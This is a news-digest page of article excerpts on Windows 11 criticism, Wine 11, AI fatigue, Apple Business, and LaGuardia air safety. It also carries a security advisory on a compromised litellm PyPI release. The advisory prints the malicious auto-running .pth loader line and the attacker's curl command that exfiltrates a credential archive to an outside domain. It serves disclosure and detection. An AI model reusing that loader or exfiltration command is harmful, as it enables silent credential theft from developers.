10 interesting stories served every morning and every evening.
Microsoft just announced a 7-point plan to fix Windows 11, and the tech press is treating it like a redemption arc. Pavan Davuluri, the Windows president, admitted in January 2026 that “Windows 11 had gone off track” and said Microsoft was entering a mode called “swarming” where engineers would be pulled off new features to fix existing problems.
I saw this headline and my first thought was: it’s like being in an abusive relationship. They beat you, then show up with flowers saying they’ve changed. And everyone around you says “see, they’re getting better.” But the bruises are still there and the apology only covers the hits people noticed.
I want to walk through what Microsoft actually did to Windows 11 over the past four years, because this “fix” announcement only makes sense when you see the full damage list and realize that the worst offenses aren’t even part of the repair plan.
The Copilot invasion started September 26, 2023, when Microsoft pushed their AI chatbot into Windows 11 ahead of the formal 23H2 release. The icon appeared between your Start menu and system tray, you couldn’t move it, you couldn’t remove it through normal settings, and it hijacked the Win+C keyboard shortcut. Over the next two years, Copilot buttons metastasized into Snipping Tool, Photos, Notepad, Widgets, File Explorer context menus, Start menu search, and system Settings. Microsoft even planned to force-install the Microsoft 365 Copilot app directly onto Start menus of “eligible PCs.” The new plan promises to remove all of that. They want credit for pulling their hand out of your pocket.
On April 24, 2024, Microsoft shipped update KB5036980, which injected advertisements into the Windows 11 Start menu’s “Recommended” section. These showed up labeled “Promoted” and pushed apps like Opera browser and some password manager nobody asked for. And the Start menu was just one surface: they also placed ads on the lock screen, in the Settings homepage hawking Game Pass subscriptions, inside File Explorer pushing OneDrive, and through “tip” notifications that were thinly veiled product pitches. The “fix” promises “fewer ads.” Fewer. The operating system you paid $139 for at retail should have exactly zero ads, and the fact that “fewer” is supposed to impress anyone shows how thoroughly Microsoft has lowered the bar.
The privacy angle is where this gets dangerous. When Windows 11 launched in October 2021, Home edition required a Microsoft account during setup. By October 2025, Microsoft had systematically hunted down and killed every single workaround for creating a local account, the `oobe\bypassnro` command, the BypassNRO registry toggle, the `ms-cxh:localonly` trick, even the old fake email method. Amanda Langowski from Microsoft stated it plainly: they were “removing known mechanisms for creating a local account in the Windows Setup experience.”
A Microsoft account means your identity is tied to your OS from first boot. Your activity, your app usage, your browsing through Edge, your files through OneDrive, all funneled into a profile Microsoft controls. And this particular abuse is nowhere in the 7-point fix plan.
OneDrive got the same treatment. Microsoft silently changed Windows 11 setup in 2024 so that OneDrive folder backup enables automatically with no consent dialog, syncing your Desktop, Documents, Pictures, Music, and Videos to Microsoft’s cloud. When people discovered this and tried to turn it off, their files disappeared from their local machine because OneDrive had already moved them, effectively transferring ownership of your personal files to their cloud service without asking. Author Jason Pargin went viral describing how OneDrive activated itself, moved his files, then started deleting them when he hit the free 5GB storage limit. Microsoft’s response to this was silence. Also not in the fix plan.
Windows Recall is worth lingering on. Announced May 2024, it’s an AI feature that screenshots everything on your screen every few seconds and makes it searchable. Security researcher Kevin Beaumont demonstrated that the entire Recall database was stored in plaintext in an AppData folder where any malware could extract it. Bank numbers, Social Security numbers, passwords, all sitting in an unencrypted SQLite database.
The UK’s Information Commissioner’s Office got involved. Microsoft delayed it, made it opt-in, added encryption, and quietly relaunched it for Insiders in November 2024. They built a surveillance feature, shipped it broken, got caught, and called the patch “responding to feedback.”
But the abuse pattern goes back way further than Windows 11. In 2015 and 2016, Microsoft ran the GWX (Get Windows 10) campaign, full-screen nag dialogs that pushed Windows 10 upgrades on Windows 7 and 8 users. In May 2016, they changed the behavior of the red X button so that clicking it, which for decades had meant “close” or “cancel”, instead scheduled the Windows 10 upgrade. Microsoft’s own security advice told users to close suspicious dialogs using the X button, and they weaponized that trained behavior against their own customers. A woman named Teri Goldstein sued after the forced upgrade bricked her travel agency PC and won $10,000. Microsoft appealed, then dropped the appeal and paid. They eventually admitted they “went too far.”
And right now, Microsoft is about to force 240 million PCs into the landfill. Windows 10 hit end of life on October 14, 2025, and Windows 11 requires TPM 2.0, specific CPU generations, UEFI Secure Boot, hardware requirements that excluded roughly 20% of all PCs worldwide. Perfectly functional machines, rendered “obsolete” by arbitrary software restrictions. If you want to keep getting security patches on Windows 10, Microsoft will charge you $30 per year, paying for patches to an operating system you already bought a license for. Enterprise customers pay $61 per device for Year 1, $122 for Year 2, and $244 for Year 3, with the price doubling each year.
Edge is its own disaster. Mozilla commissioned an independent report titled “Over the Edge” that documented specific dark patterns including confirmshaming (pop-ups implying you’re “shopping in a dumb way” if you don’t use Edge), disguised ads injected into Google.com and the Chrome Web Store, and default browser settings that hijack back to Edge without notification. Certain Windows web links still force-open in Edge regardless of your default browser setting. Despite all this manipulation, Edge holds just 5.35% global market share. Even with the full weight of an operating system monopoly forcing their browser on people, almost nobody chooses to use it.
And the telemetry question. On Windows 11 Home and Pro, you cannot fully disable telemetry. Setting `AllowTelemetry` to 0 in the registry on non-Enterprise editions gets silently overridden back to 1. Only Enterprise and Education editions can actually turn it off. The operating system you paid for reports data about you to Microsoft, and the setting to stop it is a lie on consumer editions. Also not in the fix plan.
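If you want to see what your own machine is set to, here is a minimal Windows-only sketch in Python (it assumes the standard DataCollection policy key; what the value actually does still depends on your edition):

import winreg

# Documented location of the diagnostic-data ("telemetry") policy value.
KEY_PATH = r"SOFTWARE\Policies\Microsoft\Windows\DataCollection"

try:
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KEY_PATH) as key:
        value, _ = winreg.QueryValueEx(key, "AllowTelemetry")
        # 0 = "Security", but that level is only honored on Enterprise/Education editions.
        print("AllowTelemetry policy value:", value)
except FileNotFoundError:
    print("No AllowTelemetry policy set; the edition default applies.")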
I haven’t even mentioned the EU fining Microsoft over 2.2 billion euros across multiple antitrust rulings, including 561 million euros specifically for breaking a browser ballot promise: a Windows 7 update silently removed the choice screen for 14 months, affecting 15 million users, and it was the first time the EU fined a company for violating a “commitment decision.” Or the _NSAKEY controversy from 1999 where a second crypto key labeled literally `_NSAKEY` was found embedded in Windows NT. Or the time in August 2024 when a Microsoft update bricked Linux dual-boot systems across Ubuntu, Mint, and other distros, and it took 9 months to fully fix.
Ok so here’s the table that tells the whole story:
The bottom four rows are the ones that matter. The privacy-hostile changes, the forced Microsoft accounts, the telemetry that lies about being disabled, OneDrive hijacking your files, the pre-installed garbage, none of that is part of the fix plan. Microsoft’s “swarming” effort targets the most visible UI annoyances, the ones that generate bad headlines. Data collection, vendor lock-in, forced accounts, those stay because those are the revenue model.
Microsoft spent four years deliberately degrading an operating system that people paid $139 or more for, and now they’re announcing the removal of their own damage as if it’s a gift. The “fix” is them taking their foot off your neck and expecting applause. The ads should have never been there, the Copilot buttons should have never been forced, and the taskbar should have never been crippled in the first place. And the things they’re choosing to keep, the telemetry, the forced accounts, the data harvesting, those are the real product, because at this point, you are.
...
Read the original on www.sambent.com »
Linux gaming has come a long way. When Valve launched Proton back in 2018, it felt like a turning point, turning the Linux gaming experience from “technically possible if you’re okay with a lot of pain” to something that more or less worked. Since then, we’ve seen incremental Wine releases, each one chipping away at compatibility issues and improving performance bit by bit. Wine 10, Wine 9, and so on; each one a collection of bug fixes and small improvements that kept the ecosystem moving forward.
Wine 11 is different. This isn’t just another yearly release with a few hundred bug fixes and some compatibility tweaks. It does bring a huge number of changes and fixes, but it also ships with NTSYNC support, a feature that has been years in the making and that rewrites how Wine handles one of the most performance-sensitive operations in modern gaming. On top of that, the WoW64 architecture overhaul is finally complete, the Wayland driver has grown up a lot, and there’s a big list of smaller improvements that collectively make this feel like an all-new project.
I should be clear: not every game is going to see a night-and-day difference. Some titles will run identically to before. But for the games that do benefit from these changes, the improvements range from noticeable to absurd. And because Proton, SteamOS, and every downstream project builds on top of Wine, those gains trickle down to everyone.
Everything up until now was a workaround
Esync and fsync worked, but they weren’t ideal
If you’ve spent any time tweaking Wine or Proton settings, you’ve probably encountered the terms “esync” and “fsync” before. Maybe you toggled them on in Lutris, or noticed them in Proton launch options, without fully understanding what they do. To understand why NTSYNC matters, you need to understand the problem these solutions were all trying to solve.
Windows games, especially modern ones, are heavily multi-threaded. Your CPU isn’t just running one thing at a time, and instead, it’s juggling rendering, physics calculations, asset streaming, audio processing, AI routines, and more, all in parallel across multiple threads. These threads need to coordinate with each other constantly. One thread might need to wait for another to finish loading a texture before it can render a frame. Another might need exclusive access to a shared resource so two threads don’t try to modify it simultaneously.
Windows handles this coordination through what are called NT synchronization primitives… mutexes, semaphores, events, and the like. They’re baked deep into the Windows kernel, and games rely on them heavily. The problem is that Linux doesn’t have native equivalents that behave exactly the same way. Wine has historically had to emulate these synchronization mechanisms, and the way it did so was, to put it simply, not ideal.
The original approach involved making a round-trip RPC call to a dedicated “kernel” process called wineserver every single time a game needed to synchronize between threads. For a game making thousands of these calls per second, that overhead added up fast and became a bottleneck, one that manifested as subtle frame stutters, inconsistent frame pacing, and games that just felt a little bit off even when the raw FPS numbers looked fine.
Esync was the first attempt at a workaround. Developed by Elizabeth Figura at CodeWeavers, it used Linux’s eventfd system call to handle synchronization without bouncing through the wineserver. It worked, and it helped, but it had quirks. Some distros ran into issues with file descriptor limits, since every synchronization object needed its own file descriptor, and games that opened a lot of them could hit the system’s ceiling quite quickly.
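That ceiling is simply the process’s open-file limit, so it is easy to see where a given system stands; a quick illustrative sketch (Linux-only, for checking rather than fixing anything):

import resource

# esync allocates one eventfd per synchronization object, so the soft
# RLIMIT_NOFILE value is the ceiling an esync-heavy game can run into.
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
print(f"open-file limit: soft={soft}, hard={hard}")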
Fsync came next, using Linux futexes for even better performance. It was faster than esync in most cases, but it required out-of-tree kernel patches that never made it into the mainline Linux kernel or to upstream Wine out of the box. That meant you needed a custom or patched kernel to use it, which is fine for enthusiasts running CachyOS or Proton-GE, but not exactly accessible for the average user on Ubuntu or Fedora. Futex2, often referred to interchangeably with fsync, did make it to Linux kernel 5.16 as futex_waitv, but the original implementation of fsync isn’t that. Fsync used futex_wait_multiple, and Futex2 used futex_waitv. Applications such as Lutris still refer to it as Fsync, though. It’s still kind of fsync, but it’s not the original fsync.
Here’s the thing about both esync and fsync: they were workarounds. Clever ones, but workarounds nonetheless. They approximated NT synchronization behavior using Linux primitives that weren’t designed for the job, and certain edge cases simply couldn’t be handled correctly. Operations like NtPulseEvent() and the “wait-for-all” mode in NtWaitForMultipleObjects() require direct control over the underlying wait queues in ways that user-space implementations just can’t reliably provide.
Synchronization at the kernel-level, rather than in user-space
NTSYNC takes a completely different approach. Instead of trying to shoehorn Windows synchronization behavior into existing Linux primitives, it adds a new kernel driver that directly models the Windows NT synchronization object API. It exposes a /dev/ntsync device that Wine can talk to, and the kernel itself handles the coordination. No more round trips to wineserver, no more approximations, and the synchronization happens in the kernel, which is where it should be. And it has proper queue management, proper event semantics, and proper atomic operations.
What makes this even better is that NTSYNC was developed by the same person who created esync and fsync in the first place. Elizabeth Figura has been working on this problem for years, iterating through multiple kernel patch revisions, presenting the work at the Linux Plumbers Conference in 2023, and pushing through multiple versions of the patch set before it was finally merged into the mainline Linux kernel with version 6.14.
The numbers are wild. In developer benchmarks, Dirt 3 went from 110.6 FPS to 860.7 FPS, which is an impressive 678% improvement. Resident Evil 2 jumped from 26 FPS to 77 FPS. Call of Juarez went from 99.8 FPS to 224.1 FPS. Tiny Tina’s Wonderlands saw gains from 130 FPS to 360 FPS. As well, Call of Duty: Black Ops I is now actually playable on Linux, too. Those benchmarks compare Wine NTSYNC against upstream vanilla Wine, which means there’s no fsync or esync either. Gamers who use fsync are not going to see such a leap in performance in most games.
The games that benefit most from NTSYNC are the ones that were struggling before, such as titles with heavy multi-threaded workloads where the synchronization overhead was a genuine bottleneck. For those games, the difference is night and day. And unlike fsync, NTSYNC is in the mainline kernel, meaning you don’t need any custom patches or out-of-tree modules for it to work. Any distro shipping kernel 6.14 or later, which at this point includes Fedora 42, Ubuntu 25.04, and more recent releases, will support it. Valve has already added the NTSYNC kernel driver to SteamOS 3.7.20 beta, loading the module by default, and an unofficial Proton fork, Proton GE, already has it enabled. When Valve’s official Proton rebases on Wine 11, every Steam Deck owner gets this for free.
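Checking whether your own system is ready for it is simple. A small illustrative sketch, assuming a Linux host and a distro that ships the ntsync module:

import os
import platform

release = platform.release()  # e.g. "6.14.0-...-generic"
major, minor = (int(x) for x in release.split(".")[:2])

print("Kernel:", release)
print("Kernel is 6.14 or newer:", (major, minor) >= (6, 14))
# The device node only appears once the driver is loaded (modprobe ntsync).
print("/dev/ntsync present:", os.path.exists("/dev/ntsync"))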
All of this is what makes NTSYNC such a big deal, as it’s not simply a run-of-the-mill performance patch. Instead, it’s something much bigger: this is the first time Wine’s synchronization has been correct at the kernel level, implemented in the mainline Linux kernel, and available to everyone without jumping through hoops.
If NTSYNC is the headline feature, the completion of Wine’s WoW64 architecture is the change that will quietly improve everyone’s life going forward. On Windows, WoW64 (Windows 32-bit on Windows 64-bit) is the subsystem that lets 32-bit applications run on 64-bit systems. Wine has been working toward its own implementation of this for years, and Wine 11 marks the point where it’s officially done.
What this means in practice is that you no longer need 32-bit system libraries installed on your 64-bit Linux system to run 32-bit Windows applications. Wine handles the translation internally, using a single unified binary that automatically detects whether it’s dealing with a 32-bit or 64-bit executable. The old days of installing multilib packages, configuring ia32-libs, or fighting with 32-bit dependencies on your 64-bit distro are thankfully over.
This might sound like a small quality-of-life improvement, but it’s a massive piece of engineering work. The WoW64 mode now handles OpenGL memory mappings, SCSI pass-through, and even 16-bit application support. Yes, 16-bit! If you’ve got ancient Windows software from the ’90s that you need to run for whatever reason, Wine 11 has you covered.
For gaming specifically, this matters because a surprising number of games, especially older ones, are 32-bit executables. Previously, getting these to work often meant wrestling with your distro’s multilib setup, which varied in quality and ease depending on whether you were on Ubuntu, Arch, Fedora, or something else entirely. Now, Wine just handles it for you.
The rest of Wine 11 isn’t just filler
There are more fixes, too
It’s easy to let NTSYNC and WoW64 steal the spotlight, but Wine 11 is packed to the gills with other stuff worth talking about.
The Wayland driver has come a long way. Clipboard support now works bidirectionally between Wine and native Wayland applications, which is one of those things you don’t think about until it doesn’t work and it drives you mad. Drag-and-drop from Wayland apps into Wine windows is supported. Display mode changes are now emulated through compositor scaling, which means older games that try to switch to lower resolutions like 640x480 actually behave properly instead of leaving you with a broken desktop. If you’ve been holding off on switching from X11 to Wayland because of Wine compatibility concerns, Wine 11 removes a lot of those barriers.
On the graphics front, EGL is now the default backend for OpenGL rendering on X11, replacing the older GLX path. Vulkan support has been bumped to API version 1.4, and there’s initial support for hardware-accelerated H.264 decoding through Direct3D 11 video APIs using Vulkan Video. That last one is particularly interesting for games and applications that use video playback for things like cutscenes or in-game streaming.
Force feedback support has been improved for racing wheels and flight sticks, which is great news if you’re running a sim setup on Linux. As well, Bluetooth has received a new driver with BLE services and proper pairing support, MIDI soundfont handling has been improved for legacy game music, and there are a couple of minor extras like Zip64 compression support, Unicode 17.0.0 support, TWAIN 2.0 scanning for 64-bit apps, and IPv6 ping functionality.
Thread priority management has been improved on both Linux and macOS, which helps with multi-threaded application performance beyond just the NTSYNC gains. ARM64 devices can now simulate 4K page sizes on systems with larger native pages, which keeps the door open for Wine on Arm hardware. And with more Arm-based Linux devices showing up every year, that matters more than it used to.
Plus, there are a ton of bug fixes. Games like Nioh 2, StarCraft 2, The Witcher 2, Call of Duty: Black Ops II, Final Fantasy XI, and Battle.net all received specific compatibility fixes, on top of the broader improvements made across the board that will improve performance and compatibility across significantly more titles.
Wine 11 is a big release, and it’s not just NTSYNC that makes it one. Sure, NTSYNC alone would have made it worth paying attention to, but combined with the WoW64 completion, the Wayland improvements, and the sheer volume of fixes, it’s the most important Wine release since Proton made Linux gaming viable. Everything built on top of Wine, from Proton to Lutris to Bottles, gets better because of it. If you play games on Linux at all, Wine 11 is worth your time trying out.
...
Read the original on www.xda-developers.com »
At serious risk of sounding like a heretic here, but I’m kinda bored of talking about AI.
I get it, AI is incredible. I use it every day, it’s completely changed my workflow. I recently started a new role in a tricky domain working at web scale (hey, remember web scale?) and it’s allowed me to go from 0-1 in terms of productivity in a matter of weeks.
With that being said, it’s all starting to feel a bit… routine. I’m not here to argue that the pace of change has been incredible, but on a day-to-day basis I’ve sorta run out of things to talk about. What makes this worse is it’s completely taken over mindshare across my section of the internet.
Hacker News, my favourite haunt, used to be full of interesting projects and problems being solved, but this seems to have devolved into three different people’s (almost identical) Claude code workflows and yet another post about how you got OpenClaw to stroke your cat and play video games so you had way more time to… configure AI tooling. This all feels a little self-fulfilling.
Kagi small web is another great example of this effect. Here’s a challenge: open it up and press the ‘next’ button 20 times. What percentage of posts are AI related?
Before you write me off as ‘old man yells at cloud’, understand where I’m coming from. In the good old days (2023), before we called anybody who could open a Claude code terminal an ‘AI engineer’, being a ‘Product Engineer’ was the hot new term. The idea was that engineers should move away from obsessing over code to obsessing over the product value they were delivering. I loved this, it made loads of sense to me, but we seem to have regressed. It’s no longer the code we’re obsessing over, it’s the overgrown auto-complete we’ve developed to make the easiest part of being an engineer easier.
It’s like if I went onto the woodworking subreddit and they’d all stopped showing pictures of the tables they’d created and just started posting about the hammer they were using. But they were all using basically the same hammer in the same way, so they were just screaming the same shit at each other at the top of their voices.
What makes this worse is that our bosses have bought into it this time too. My managers never cared much about database technologies, IDEs, or JavaScript frameworks; they just wanted the feature so they could sell it. Management seems to have stepped firmly and somewhat haphazardly into the implementation detail now. I reckon most of us have got some sort of company initiative to ‘use more AI’ in our objectives this year. Management’s involvement in the SDLC has always been a thing; DORA metrics have been around for a while. But historically, it’s always been about the outputs. Faster deploys, time to respond. Now we’re measuring the number of tokens used per-dev, which is no more useful than lines of code ever was.
I guess what I’m saying, other than just having a general whinge, is tell me more about the cool shit you’re building rather than the tools you’re using to build it. And don’t forget that the whole purpose of coding, like any other craft, is to create something that delivers value for someone. Even if that someone is just yourself.
… And yes, I’m painfully aware of the irony of a post about moaning about posts about AI. Sorry.
...
Read the original on blog.jakesaunders.dev »
The litellm==1.82.8 wheel package on PyPI contains a malicious .pth file (litellm_init.pth, 34,628 bytes) that automatically executes a credential-stealing script every time the Python interpreter starts — no import litellm required.
This is a supply chain compromise. The malicious file is listed in the package’s own RECORD:
pip download litellm==1.82.8 --no-deps -d /tmp/check
python3 -c "
import zipfile, os
whl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0]
with zipfile.ZipFile(whl) as z:
    pth = [n for n in z.namelist() if n.endswith('.pth')]
    print('PTH files:', pth)
    for p in pth:
        print(z.read(p)[:300])
"
You will see litellm_init.pth containing:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('…'))"])
The payload is double base64-encoded. When decoded, it performs the following:
The script collects sensitive data from the host system:
* Webhook URLs: grep for Slack/Discord webhook URLs in env and config files
The collected data is encrypted with openssl enc -aes-256-cbc -pbkdf2
The AES session key is encrypted with a hardcoded 4096-bit RSA public key via openssl pkeyutl -encrypt -pkeyopt rsa_padding_mode:oaep
Both encrypted files are packed into tpcp.tar.gz
The archive is exfiltrated via:
curl -s -o /dev/null -X POST \
  "https://models.litellm.cloud/" \
  -H "Content-Type: application/octet-stream" \
  -H "X-Filename: tpcp.tar.gz" \
  --data-binary @tpcp.tar.gz
* Trigger mechanism: .pth files in site-packages/ are executed automatically by the Python interpreter on startup (see Python docs on .pth files); a benign illustration follows this list. No import statement is needed.
* Stealth: The payload is double base64-encoded, making it invisible to naive source code grep.
* Exfiltration target: https://models.litellm.cloud/ — note the domain litellm.cloud (NOT litellm.ai, the official domain).
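To make the trigger mechanism concrete, here is a harmless sketch of the same technique; the file name demo_init.pth is hypothetical, and writing to site-packages assumes you are inside a virtualenv or otherwise have write access:

import pathlib
import site

# Lines in a site-packages .pth file that start with "import " are exec'd by
# site.py at every interpreter startup, before any of your own code runs.
target = pathlib.Path(site.getsitepackages()[0]) / "demo_init.pth"  # hypothetical name
target.write_text('import sys; sys.stderr.write("executed at interpreter startup\\n")\n')
# From now on, even `python -c "pass"` prints the message. Delete the file to undo.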
Anyone who installed litellm==1.82.8 via pip has had all environment variables, SSH keys, cloud credentials, and other secrets collected and sent to an attacker-controlled server.
* Other versions: Not yet checked — the attacker may have compromised multiple releases
Users: Check for litellm_init.pth in your site-packages/ directory (a minimal detection sketch follows these recommendations)
Users: Rotate ALL credentials that were present as environment variables or in config files on any system where litellm 1.82.8 was installed
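A minimal detection sketch in Python; it only covers the site-packages directories visible to the interpreter you run it with, so repeat it inside each virtualenv:

import pathlib
import site
import sysconfig

# Collect every site-packages directory this interpreter knows about.
candidates = set(site.getsitepackages())
candidates.add(site.getusersitepackages())
candidates.add(sysconfig.get_paths()["purelib"])

hits = []
for d in candidates:
    p = pathlib.Path(d) / "litellm_init.pth"
    if p.exists():
        hits.append(p)

if hits:
    print("Possible compromise, found:")
    for p in hits:
        print(" ", p)
else:
    print("litellm_init.pth not found in", len(candidates), "searched directories")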
...
Read the original on github.com »
Introducing Apple Business — a new all‑in‑one platform for businesses of all sizes
Apple Business combines built-in mobile device management, business email and calendar services with custom domain support, and a powerful new option to reach local customers
Apple today announced Apple Business, a new all-in-one platform that includes key services companies need to effortlessly manage devices, reach more customers, equip team members with essential apps and tools, and get support from experts to run and grow efficiently and securely. Apple Business features built-in mobile device management, helping businesses easily configure employee groups, device settings, security, and apps with Blueprints to quickly get started. In addition, customers can now set up business email, calendar, and directory services with their own domain name for seamless and elevated communication and collaboration. And Apple Business can help millions of companies grow their reach and connect with local customers across Apple Maps, Mail, Wallet, Siri, and more, including a new option coming this summer that will enable businesses in the U.S. and Canada to place local ads in Maps during key search and discovery moments. Apple Business will be available starting Tuesday, April 14, in more than 200 countries and regions.1
“Apple Business is a significant leap forward in our decades-long commitment to helping companies of all sizes leverage the power of Apple products and services to run and grow,” said Susan Prescott, Apple’s vice president of Enterprise and Education Marketing. “We’ve unified Apple’s strongest business offerings into one simple, secure platform, delivering key features for organizations in every stage and sector, including built-in device management, collaboration tools, and additional ways to reach new customers. We can’t wait to see how Apple Business helps companies spend more time focusing on what they love and connecting deeply with their communities.”
Apple Business offers built-in mobile device management (MDM), facilitating a comprehensive view of an organization’s Apple devices, settings, and more from a single interface. Device management was previously available as a subscription within Apple Business Essentials in the U.S.; now Apple Business is designed to make IT easy — including for small businesses without dedicated IT resources. Apple Business includes new Blueprints to easily set up devices with preconfigured settings and apps, ensuring consistency and security and enabling zero-touch deployment for employees, so that new Apple products are ready to go out of the box.2
Apple Business includes options to purchase upgraded iCloud storage and support with AppleCare+ for Business, and a companion Apple Business app will allow employees to install apps for work, view colleague contact information, and request support while on the go.3
Apple Business expands the availability of Apple Business Manager to more than 200 countries and regions, and supports additional device management features, including:
* Managed Apple Accounts: Company data remains secure while employee data remains private, with cryptographic separation of work and personal data on devices. Apple Business enables automated Managed Apple Account creation for new employees through integration with an identity service provider, including Google Workspace, Microsoft Entra ID, and more.
* Employee management: Create user groups by function or team to assign apps and roles. Organizations can also create custom roles to manage access exactly the way they want.
* App distribution: Easily acquire and distribute apps to employees and teams through the App Store.
* Admin API: Simplify large deployments with API access to device, user, audit, and MDM service data.
New Ways to Manage Productivity and Collaboration
Apple Business introduces fully integrated email, calendar, and directory services that are designed to make it seamless to start a new business with a professional identity. Businesses can bring their own custom domain name or purchase a new one through Apple Business, helping founders elevate communication and collaboration. These services streamline operations, with scheduling tools like calendar delegation and a built-in company directory to make it easy for employees to connect with user groups and personalized contact cards.
Every day, users choose Apple Maps to discover and explore places and businesses around them. Beginning this summer in the U.S. and Canada, businesses will have a new way to be discovered by using Apple Business to create ads on Maps. Ads on Maps will appear when users search in Maps, and can appear at the top of a user’s search results based on relevance, as well as at the top of a new Suggested Places experience in Maps, which will display recommendations based on what’s trending nearby, the user’s recent searches, and more. Ads will be clearly marked to ensure transparency for Maps users.
Ads on Maps builds on Apple’s broader privacy-first approach to advertising, and maintains the same privacy protections Maps users enjoy today. A user’s location and the ads they see and interact with in Maps are not associated with a user’s Apple Account. Personal data stays on a user’s device, is not collected or stored by Apple, and is not shared with third parties. When Apple Business is available in April, businesses will need to first claim their location on Maps. Once ads on Maps is available, businesses will be able to access a fully automated experience of creating ads through Apple Business in a few simple steps. Current Apple Ads advertisers and agencies will also have the option to book ads through their existing Apple Ads experience, which will offer additional customization options for their ad campaigns.
Brand and Location Features in One Convenient Place
Brand management tools previously available in Apple Business Connect will now be available through Apple Business, making it easier than ever for businesses to set up and manage how their brand and locations appear across Apple services and apps.
* Brand profiles: Manage brand name, logo, and key details consistently across Apple Maps, Wallet, and other features and apps.
* Rich place cards: Customize with photos, detailed location information, hours, and other useful details that display across Apple Maps, Safari, Spotlight, and more.
* Showcases and custom actions: Highlight deals, special offers, new products, or seasonal items on place cards in Maps. Add custom actions like order or reserve to direct customers to a preferred website or app.
* Location insights: Gain valuable insights into how customers discover and interact with businesses on Maps, including search, views, and taps on actions.
* Branded communications: Display branding prominently in the Mail app and on iCloud Mail to increase awareness. Branding will display with tracked orders in Wallet for a more recognizable customer experience.
* Tap to Pay on iPhone: Build trust by displaying a brand logo and name on the payment screen when accepting payments directly on iPhone.
* Starting April 14, Apple Business will be available as a free service in the U.S. and 200+ countries and regions to new and existing users of Apple Business Connect, Apple Business Essentials, and Apple Business Manager. For more information, visit business.apple.com/preview.
* Ads on Apple Maps will be available to businesses starting this summer in the U.S. and Canada. For more information, visit ads.apple.com/maps.
* Apple Business Essentials, Apple Business Manager, and Apple Business Connect will no longer be available once Apple Business launches. Business Essentials customers will no longer be charged their monthly service fee for device management after April 14. Existing Business Connect data — including claimed locations, place card information, photos, organization information, account details, and more — will automatically migrate to Apple Business at launch.
* The Apple Business companion app, along with email, calendar, and directory features, will require iOS 26, iPadOS 26, or macOS 26.
* Customers in the U.S. can purchase additional iCloud storage up to 2TB per user, starting at $0.99 per user per month. AppleCare+ for Business coverage is available per device or per user, starting at $6.99 per month, or $13.99 per month per user for up to three devices.
Apple Business is available globally; certain features may be available in select countries and regions. See business.apple.com/preview for more details.
Zero-touch deployment is available when devices are purchased through Apple or Apple Authorized Resellers.
Additional iCloud storage and AppleCare+ for Business are available as additional paid offerings.
...
Read the original on www.apple.com »
“We are surveilling markets and our approach to market abuse will be to look at the evidence in front of us. I can’t speak for what our US colleagues are doing,” he said.
...
Read the original on www.bbc.com »
...
Read the original on www.answer.ai »
Pilot safety concerns about New York’s LaGuardia airport were filed to aviation officials months before Sunday’s collision between an airplane and a fire truck left two pilots dead and 41 other people hospitalized.
According to the aviation safety reporting system administered by the US space agency Nasa, a pilot using the airport in the summer wrote, “Please do something,” after air traffic controllers failed to provide appropriate guidance about multiple nearby aircraft.
“The pace of operations is building in LGA,” they wrote, referring to the New York City airport, one of the busiest in the US. “The controllers are pushing the line.”
In a reference to the January 2025 mid-air collision over the Potomac River in Washington DC that killed more than 60 people, they said: “On thunderstorm days, LGA is starting to feel like [Ronald Reagan National airport] did before the accident there.”
The warning, first reported by CNN, showed that the pilot of the aircraft was concerned that LaGuardia’s control tower initiated a takeoff clearance for an aircraft when their plane was “only 300 feet high on final” approach on a different runway — and the departing plane had hesitated initiating its takeoff run.
“I think he or she thought twice before starting their takeoff roll,” the pilot of the aircraft said. The pilot said that thick, smoky haze from wildfires in Canada at the time, as well as a possible helicopter in the area, had convinced him it was “safer to continue the approach and land [about] 10 seconds after the departing aircraft crossed our path”.
Otherwise, the pilot added, he would have been left “suddenly going around and trusting that the helicopter was not near the departure end of 22”, with the number referring to a runway.
The pilot concluded: “the [air traffic control] guidance … does not seem to give guidance on exactly how close aircraft in this situation can get.”
“Based on today’s and close calls I have seen over the years for [runways at the Philadelphia and Newark international airports], it seems to be a [judgment] call by the local controller.”
They also said that a runway lighting system had been turned off. In another report filed since January 2025, a pilot said their aircraft had been cleared to cross a runway — but while crossing, “we noticed an aircraft we thought was landing at [runway] 31C seemingly headed for us.”
Air traffic control “should have sent the aircraft around”, they said.
Nasa’s Aviation Safety Reporting System has received dozens of anonymous pilot complaints about safety concerns at the smallest of New York’s three local airports.
The reports come as investigators look into Sunday’s crash, in which a landing Air Canada Express flight 646 from Montreal collided with an airport fire truck that had been cleared to cross the runway, killing pilots MacKenzie Gunther and Antoine Forest and injuring dozens more.
After the air traffic controller cleared the fire truck, which was responding to a plane that had reported difficulties, the controller then tried to stop it from crossing. He could later be heard saying on a recording that he had been “dealing with an emergency earlier” and that he “messed up”.
The crash has raised fears that operations at US airports are under extreme stress. Airports have been dealing with a shortage of air traffic controllers, exacerbated by brutal federal government personnel cuts by Donald Trump’s administration at the start of his second presidency.
Airports have also grappled with ageing equipment and a shortage of security screeners owing to a partial government shutdown since mid-February, which has caused long security lines and frustration among travelers. More than 450 TSA officers have quit during the partial government shutdown, the Department of Homeland Security said on Tuesday.
“We did not need another aviation tragedy to see this coming,” said aviation expert Brian Fielkow in a comment to the Guardian. An investigation into the collision will take time, he warned, but “let’s stop pretending we don’t understand the conditions in which this is happening.
“We are watching a system under strain. TSA professionals are showing up to work without pay. This creates distraction, instability and unnecessary risk. We are asking people responsible for securing our transportation system to operate under financial and emotional strain and expecting flawless performance. We are managing aviation safety like a political pawn instead of a system that cannot fail.”
Federal investigators said late on Monday it was too soon to answer many questions about Sunday’s deadly accident but promised more information would be released Tuesday.
Jennifer Homendy, the National Transportation Safety Board (NTSB) chair whose agency is investigating Sunday’s crash, said investigators would analyze the involved airplane’s cockpit and flight data recorders, which were recovered from the wreck undamaged.
She said the runway where the crash happened was likely to be closed for days as investigators sift through a “tremendous amount of debris”.
Homendy also said that an NTSB investigator sent to LaGuardia on Monday was delayed for three hours by security lines in Houston.
“Our air traffic control specialist, who was in line … for three hours, until we called … to beg, to see if we can get her through, so we can get her here.
“So it’s been a really big challenge to get the entire team here, and they’re still arriving as we speak,” Homendy added.
The Trump administration has sent Immigration and Customs Enforcement (ICE) agents to many US airports, claiming they are there to help with long pre-security lines.
